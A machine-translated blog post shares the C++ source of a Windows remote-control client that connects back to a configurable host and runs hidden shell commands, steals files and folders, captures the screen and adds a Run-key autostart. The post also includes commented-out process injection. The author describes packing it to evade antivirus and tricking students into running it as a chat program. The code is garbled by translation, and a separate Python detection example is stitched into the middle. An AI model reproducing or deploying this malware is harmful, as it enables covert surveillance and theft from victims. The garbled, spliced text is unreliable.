A remote control program written in VC

Source: Internet
Author: User

I have been learning VC for a while, but I had never used VC to write a remote control program. It was a little more difficult at the beginning. Recently I felt I could try it, and after writing it I feel that I have learned a lot, especially about network programming.

The following is the source code of the client of my program. I am going to share it with you.

// Controlclient. CPP: defines the entry point for the console application. <br/> // </P> <p> # include "stdafx. H "<br/> typedef struct {<br/> DWORD wait; <br/> DWORD open; <br/> DWORD exec; <br/> dword pid; <br/> handle h; <br/> char path [255]; <br/>}info; <br/> typedef handle (_ stdcall * OpenProcess) (DWORD, bool, DWORD); <br/> typedef DWORD (_ stdcall * waitforsingleobject) (handle, DWORD); <br/> typedef uint (_ stdca Ll * winexec) (lpcstr, uint); <br/> handle XR; <br/> handle MH; <br/> char screenpath [200] = {0 }; <br/> DWORD winapi T (lpvoid p) {<br/> info * P1 = (Info *) P; <br/> winexec W = (winexec) p1-> exec; <br/> OpenProcess o = (OpenProcess) P1-> open; <br/> waitforsingleobject wait = (waitforsingleobject) P1-> wait; </P> <p> P1-> H = O (process_all_access, false, P1-> PID); <br/> // while (1) {<br/> wait (P1-> H, infinite); <br/> W (P1-> path, 1); <br/ >//}< Br/> // messageboxa (0, P1-> A, P1-> A, 0); <br/> // while (1 ); <br/> return 0; <br/>}< br/> DWORD getpid (char * P) {<br/> processentry32 p32; <br/> p32.dwsize = sizeof (p32); <br/> handle HPS =: createconlhelp32snapshot (th32cs_snapprocess, 0); <br/>: process32first (HPS, & p32); <br/> do {<br/> If (: stricmp (p32.szexefile, P) = 0) {<br/> //:: messageBox (0, "1", "1", 0); <br/>: closehandle (HPS); <br/> return p32.th32p Rocessid; <br/>}< br/>} while (: process32next (HPS, & p32); <br/> return 0; <br/>}< br/> void inject () {<br/> int pid = getpid ("assumer.exe"); <br/> handle pH = :: openProcess (process_all_access, false, pid); <br/> void * s; <br/> S =: virtualallocex (pH, * 4, mem_commit, page_execute_readwrite ); <br/>: writeprocessmemory (pH, S, T, 1024 *); <br/> info I; <br/> zeromemory (& I, sizeof (I); <br/> char path [255] = {0}; <br /> Getmodulefilename (0, path, 255); <br/> strcpy (I. path, PATH); <br/> hmodulem =: loadlibrary ("kernel32.dll"); <br/> I. wait = (DWORD): getprocaddress (M, "waitforsingleobject"); <br/> I .exe c = (DWORD) getprocaddress (M, "winexec "); <br/> I. 
open = (DWORD) getprocaddress (M, "OpenProcess"); <br/> I. PID = getcurrentprocessid (); <br/> info * S1; <br/> S1 = (Info *): virtualallocex (pH, 0, sizeof (Info), mem_commit, page_readwrite); <br/ >:: Writeprocessmemory (pH, S1, & I, sizeof (Info), 0); <br/> DWORD tid; <br/> RTL =: createremotethread (pH, 0, 0, (lpthread_start_routine) s, S1, 0, & tid); <br/>}< br/> void enabledebugpriv () // upgrade the process to debug permission <br/>{< br/> handle htoken; <br/> token_privileges TP; <br/> luid; <br/> // open the process Token Ring <br/> openprocesstoken (getcurrentprocess (), <br/> token_adjust_privileges | token_query, <br/> & htoken ); <br/> // obtain the local unique ID of the Process <br/> look Upprivilegevalue (null, se_debug_name, & luid); <br/> TP. privilegecount = 1; <br/> TP. privileges [0]. attributes = se_privilege_enabled; <br/> TP. privileges [0]. luid = luid; <br/> // adjust process permissions <br/> adjusttokenprivileges (htoken, 0, & TP, sizeof (token_privileges), null, null ); <br/>}< br/> int getclsid (const wchar * format, CLSID * pclsid) <br/>{< br/> uint num = 0; // Number of image encoders <br/> uint size = 0; // SIZE OF THE I Mage encoder array in bytes </P> <p> imagecodecinfo * pimagecodecinfo = NULL; </P> <p> getimageencoderssize (& num, & size ); <br/> If (size = 0) <br/> return-1; // failure </P> <p> pimagecodecinfo = (imagecodecinfo *) (malloc (size); <br/> If (pimagecodecinfo = NULL) <br/> return-1; // failure </P> <p> getimageencoders (Num, size, pimagecodecinfo); </P> <p> for (uint J = 0; j <num; ++ J) <br/>{< br/> If (wcscmp (pimagecodec Info [J]. mimetype, format) = 0) <br/>{< br/> * pclsid = pimagecodecinfo [J]. CLSID; <br/> return J; // success <br/>}< br/>}// for </P> <p> return-1; // failure <br/>}< br/> queue <string> V; <br/> int foldersize = 0; <br/> void folderinit (string S) {<br/> win32_find_data D; <br/> handle H = findfirstfile (S + "//*. *"). data (), & D); <br/> do {<br/> If (stricmp (D. cfilename ,". 
") = 0 | stricmp (D. cfilename ,".. ") = 0) {<br/> Continue; <br/>}< br/> If (D. dwfileattributes & file_attribute_directory) {<br/> v. push (S + "//" + D. cfilename + "1"); <br/> folderinit (S + "//" + D. cfilename); <br/>}else {<br/> v. push (S + "//" + D. cfilename + "0"); <br/> foldersize + = (D. nfilesizehigh * (maxdword + 1) + d. nfilesizelow); <br/>}< br/>}while (findnextfile (H, & D); <br/> findclose (h ); <br/>}< br/> int main (INT argc, char * argv []) <br/>{</P> <p> // enabledebuupli V (); <br/> // inject (); <br/> MH =: createmutex (null, false, "sxsxsx1 "); <br/> If (getlasterror () = error_already_exists) <br/>{< br/> return 0; <br/>}</P> <p> ulong_ptr m_gdiplustoken; <br/> gdiplus: gdiplusstartupinput; <br/> gdiplus: gdiplusstartup (& m_gdiplustoken, & gdiplusstartupinput, null); <br/> wsadata data; <br/> word VV = makeword (); <br/> wsastartup (VV, & data); <br/> mysocket MS; <br /> MS. init (); </P> <p> char CP [255] = {0}; <br/> getmodulefilename (0, CP, 255 ); <br/> file * cf = fopen (CP, "rb"); <br/> fseek (CF, 0-sizeof (INI), seek_end ); </P> <p> ini ci; <br/> fread (& CI, sizeof (CI), 1, CF); <br/> fclose (CF ); <br/> char * desip = 0; <br/> If (CI. flag = 1) {<br/> desip = CI. text; <br/>}else {<br/> desip = Ms. gethostbyname (CI. text); <br/>}</P> <p> getwindowsdirectory (screenpath, 200); <br/> strcat (screenpath, "// bilblt "); <Br/> con: While (Ms. connect (desip, 2000) {<br/> sleep (1000); <br/>}< br/> while (1) {<br/> MSG m; <br/> int r = Ms. recv (char *) & M, sizeof (M), 1); <br/> If (r =-1 | r = 0) {<br/> MS. close (); <br/> MS. init (); <br/> goto con; <br/>}< br/> If (stricmp (M. flag, "command") = 0) {<br/> char cmd [200] = {0}; <br/> getsystemdirectory (CMD, sizeof (CMD )); <br/> strcat (CMD, "// cmd.exe/C"); <br/> strcat (CMD, M. command); <br/> security_attr Ibutes SA; <br/> SA. nlength = sizeof (security_attributes); <br/> SA. binherithandle = true; </P> <p> SA. 
lpsecuritydescriptor = 0; <br/> handle P, P1; <br/> createpipe (& P, & P1, & SA, 0); <br/> startupinfo start; <br/> Start. CB = sizeof (startupinfo); <br/> getstartupinfo (& START); <br/> Start. hstderror = p1; <br/> Start. hstdoutput = p1; <br/> Start. wshowwindow = sw_hide; </P> <p> Start. dwflags = startf_useshowwindow | startf_usestdhandle S; <br/> process_information PI; </P> <p> CreateProcess (0, CMD, 0, 0, true, 0, 0, & START, & PI ); <br/> // waitforsingleobject (Pi. hprocess,-1); </P> <p> closehandle (P1); <br/> Char out [1024] = {0}; <br/> while (1) {<br/> dword n; <br/> readfile (p, out, 1023, & N, 0); <br/> If (n> 0) {<br/> MS. send (Out, 1024); <br/> memset (void *) Out ); </P> <p >}else {<br/> * out = 0; <br/> MS. send (Out, 1024); <br/> break; <br/>}</P> <p> close Handle (p); </P> <p>} else if (stricmp (M. flag, "down") = 0) {<br/> downpic: file * F; <br/> F = fopen (M. command, "rb"); <br/> If (f) {<br/> fseek (F, 0, seek_end ); <br/> int L = ftell (f); <br/> fseek (F, 0, seek_set); <br/> If (L> 0) {<br/> MS. send (char *) & L, sizeof (INT); <br/> char B [1024] = {0}; <br/> int n = fread (B, 1, 1024, f); <br/> while (n) {<br/> MS. send (B, n); <br/> N = fread (B, f); <br/>}< br/>} else {<br/> MS. send (char *) & L, Si Zeof (INT); <br/>}< br/>}else {<br/> int L = 0; <br/> MS. send (char *) & L, sizeof (INT); <br/>}< br/> fclose (f); <br/> If (stricmp (M. command, screenpath) = 0) {<br/> unlink (screenpath); <br/>}< br/>} else if (stricmp (M. flag, "up") = 0) {<br/> file * f = fopen (M. command, "WB"); <br/> int L = m. num; <br/> int I = 0; <br/> while (I <L) {<br/> MSG m; <br/> MS. recv (char *) & M, sizeof (m); <br/> fwrite (M. command, 1, M. num, f); <br/> I + = m. num; <Br/> MS. send (char *) & I, sizeof (INT); </P> <p >}< br/> fclose (f ); <br/>} else if (stricmp (M. 
flag, "screen") = 0) {<br/> int W = getsystemmetrics (sm_cxscreen); <br/> int H = getsystemmetrics (sm_cyscreen ); <br/> HDC Dc = getdc (0); <br/> HDC DC1 = createcompatibledc (DC); <br/> hbitmap B = createcompatiblebitmap (DC, W, H ); <br/> hbitmap old = (hbitmap) SelectObject (DC1, B); <br/> bitblt (DC1, W, H, DC, srccopy | 0x40000000); <br/> SelectObject (DC1, old); <br/> deletedc (DC); <br/> image * I; <br/> I = bitmap: fromhbitmap (hbitmap) b, 0); <br/> CLSID gifcodec; <br/> getclsid (L "image/JPEG", & gifcodec); <br/> int Len = multibytetowidechar (cp_acp, 0, screenpath, strlen (screenpath), 0, 0); <br/> wchar_t * WL = new wchar_t [Len + 1]; <br/>: multibytetowidechar (cp_acp, null, screenpath, strlen (screenpath), wl, Len); <br/> WL [Len] = 0; <br/> I-> Save (WL, & gifcode C, 0); <br/> Delete [] Wl; <br/> Delete I; <br/> deletedc (DC1); <br/> deleteobject (B ); <br/> strcpy (M. flag, "down"); <br/> strcpy (M. command, screenpath); <br/> goto downpic; <br/>} else if (stricmp (M. flag, "close") = 0) {<br/> terminatethread (HDR, 0); <br/> closehandle (HDR); <br/> cout <1; <br/> MS. send (char *) & M, sizeof (m); <br/> cout <2; <br/> MS. close (); <br/> cout <3; <br/> closehandle (MH); <br/> wsacleanup (); <br/> G Diplusshutdown (m_gdiplustoken); <br/> exitprocess (0); <br/>} else if (stricmp (M. flag, "folder") = 0) {<br/> foldersize = 0; <br/> while (! V. empty () {<br/> v. pop (); <br/>}< br/> v. push (string (M. command) + "1"); <br/> folderinit (M. command); <br/> MS. send (char *) & foldersize, sizeof (INT), 1); <br/> while (! V. empty () {<br/> string S = v. front (); <br/> v. pop (); <br/> folder ff; <br/> string ty = S. substr (S. length ()-1, 1); <br/> If (TY = "0") {<br/> ff. type = 0; <br/> strcpy (FF. name, (S. substr (0, S. length ()-2 )). data (); <br/> file * F; <br/> F = fopen (FF. name, "rb"); <br/> If (f) {<br/> fseek (F, 0, seek_end ); <br/> int L = ftell (f); <br/> fseek (F, 0, seek_set); <br/> If (L> 0) {<br/> ff. size = L; <br/> MS. 
send (char *) & ff, sizeof (ff), 1); <br/> char B [1, 1024] = {0 }; <br/> int n = fread (B, 1,1024, f); <br/> while (n) {<br/> MS. send (B, n, 1); <br/> N = fread (B, 1,1024, F ); <br/>}< br/>}else {<br/> continue; <br/>}< br/>} else {<br/> continue; <br/>}< br/> fclose (f); <br/>}else {<br/> ff. type = 1; <br/> strcpy (FF. name, (S. substr (0, S. length ()-2 )). data (); <br/> MS. send (char *) & ff, sizeof (ff), 1); <br/>}</P> <p >}< br/> folder ff; <br/> ff. type = 2; <br/> MS. send (char *) & ff, sizeof (ff), 1); <br/>}else if (stricmp (M. flag, "Startup") = 0) {</P> <p> hkey; <br/> char lprun [100] = {0 }; <br/> strcpy (lprun, "software // Microsoft // W"); <br/> strcat (lprun, "indows // CurrentVersion // R "); <br/> strcat (lprun, "UN"); <br/> long LRET = regopenkeyex (HKEY_LOCAL_MACHINE, lprun, 0, key_all_access, & hkey ); <br/> If (LRET = error_success) <br/>{< br/> char pfilename [max_path] = {0 }; <br/> DWORD dwret = getmodulefilename (null, pfilename, max_path); <br/> LRET = regsetvalueex (hkey, "myclient", 0, REG_SZ, (byte *) pfilename, dwret); <br/> regclosekey (hkey); <br/>}</P> <p> MS. send (char *) & M, sizeof (M), 1); <br/>}</P> <p> return 0; <br/>}

I had planned to use remote thread injection to protect the program, but in testing 360 reported it as a virus, so this function is commented out. The server can execute commands on the remote computer, download and upload files and folders, and monitor the screen (this is a constant, images are stored in JPG format; testing found that the transmission rate is not flattering, and I estimate that the image compression rate is not enough. Alas, I have read the source code of other professional screen monitoring programs). The client can connect to the server in two ways, by IP address or by domain name, and the server is shelled with ASPack; otherwise 360 will report a virus. It seems that Kingsoft guard still cannot survive. Alas, there was no way around it: I found that the program was slow after shelling, and the echo of commands had to wait for half a day.
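Seen from the defender's side, the client source above leaves three host behaviours that can be correlated per process: it writes its own path into the HKLM `Run` key (value `myclient`), it opens an outbound connection (port 2000 in the source), and it spawns `cmd.exe /C` children. The following is an added example, not part of the original post, that runs that correlation over constructed events. The field names follow Sysmon event IDs 1, 3 and 13; the paths, addresses and function names are assumptions made for illustration.

```python
from collections import defaultdict

RUN_KEY = "\\software\\microsoft\\windows\\currentversion\\run\\"

def tag(event):
    """Map one Sysmon-style event to (process image, behaviour), or None."""
    eid = event["EventID"]
    image = event.get("Image", "").lower()
    if eid == 13:  # registry value set
        data = event["Details"].lower().strip('"')
        # Autorun value whose data is the writing process's own path
        if RUN_KEY in event["TargetObject"].lower() and data == image:
            return image, "self_autorun"
    elif eid == 1:  # process creation: cmd.exe /C <command>, charged to the parent
        if image.endswith("\\cmd.exe") and "/c" in event["CommandLine"].lower().split():
            return event["ParentImage"].lower(), "spawns_cmd"
    elif eid == 3:  # network connection
        return image, "outbound"
    return None

def correlate(events, threshold=2):
    """Return images showing at least `threshold` distinct behaviours."""
    seen = defaultdict(set)
    for ev in events:
        hit = tag(ev)
        if hit:
            seen[hit[0]].add(hit[1])
    return {img: sorted(t) for img, t in seen.items() if len(t) >= threshold}

# Constructed sample events (hypothetical paths and addresses).
CLIENT = r"C:\Users\alice\Downloads\chat.exe"
RUN = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
SAMPLE_EVENTS = [
    # Benign: an installer registers a different program for autorun.
    {"EventID": 13, "Image": r"C:\Program Files\App\setup.exe",
     "TargetObject": RUN + r"\App", "Details": r"C:\Program Files\App\app.exe"},
    # Benign: ordinary browser traffic, a single behaviour.
    {"EventID": 3, "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443},
    # The three behaviours of the client, all from one image.
    {"EventID": 13, "Image": CLIENT, "TargetObject": RUN + r"\myclient",
     "Details": CLIENT},
    {"EventID": 3, "Image": CLIENT, "DestinationIp": "203.0.113.10",
     "DestinationPort": 2000},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /C dir", "ParentImage": CLIENT},
]

if __name__ == "__main__":
    for image, behaviours in correlate(SAMPLE_EVENTS).items():
        print(image, behaviours)
```

The rule keys on the self-referencing autorun entry and on the combination of behaviours rather than on the value name or port, since both are single constants in the source and change with a recompile.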

The complete code will be uploaded to my CSDN for download as soon as possible. If you are interested, you can check it. The code has been tested many times and there should be no major problems. I don't want to update it, nor do I want to make it into a gray pigeon. Besides, my level is not enough.

I hope you can correct the shortcomings in this article.

PS: Speaking of code testing, it is okay to test on the local machine. The key lies in the testing on the Wide Area Network. There will be a lot of trouble. I don't have to do that for two machines, so I lied to my students that the chat program told them to run the program. Some of them couldn't bear to cheat me. As a result, many of their computers reported viruses and offended many people. Alas, now I think it's enough to write a program. It's just for the sake of improving our technology. If I do a test, I don't want to look at people's privacy. The more I know, the larger the gap between the ideal and the reality, in the end, I feel like myself. I would like to apologize to my offended friends, and please forgive me. If you don't talk about it, you have to vomit again.

Hard work, hard work, self-confidence, self-improvement!
